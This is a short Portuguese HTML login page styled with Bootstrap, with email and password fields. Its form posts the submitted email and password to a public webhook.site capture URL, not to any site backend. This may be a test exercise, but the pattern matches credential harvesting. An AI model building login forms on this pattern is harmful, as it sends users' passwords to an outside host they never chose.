<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <title>Entrar</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css">
    <style>
        body {
            background-color: #f8f9fa; 
            color: #343a40; 
            padding: 20px;
        }

        h1 {
            color: #343a40; 
            text-align: center;
        }

        .entrar {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .form {
            background-color: white; 
            border: 1px solid #343a40; 
            border-radius: 5px;
            padding: 20px;
            width: 300px;
        }

        label {
            color: #343a40; 
            font-weight: bold;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #343a40; 
            border-radius: 5px;
        }

        input[type="radio"] {
            margin-right: 5px;
        }

        button {
            background-color: #343a40; 
            color: white; 
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            width: 100%;
        }

        button:hover {
            background-color: #212529;
        }
    </style>
</head>
<body>
    <div class="container entrar">
        <div class="form">
            <form action="https://webhook.site/7460537e-2798-4828-9cda-3e24e9300ab1" method="post">
                <h1 class="mb-4">Entrar</h1>
                <div class="form-group">
                    <label for="email">Email</label>
                    <input type="text" class="form-control" id="email" name="email" placeholder="Email">
                </div>
                <div class="form-group">
                    <label for="senha">Senha</label>
                    <input type="password" class="form-control" id="senha" name="senha" placeholder="Senha">
                </div>
                <div class="form-group form-check">
                    <input type="checkbox" class="form-check-input" id="gravarSenha" name="gravarSenha">
                    <label class="form-check-label" for="gravarSenha">Lembrar de mim</label>
                </div>
                <button type="submit" class="btn btn-dark">Entrar</button>
                <p class="mt-3">Não tem uma conta? <a href="cadastro.html">Criar conta</a></p>
            </form>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>
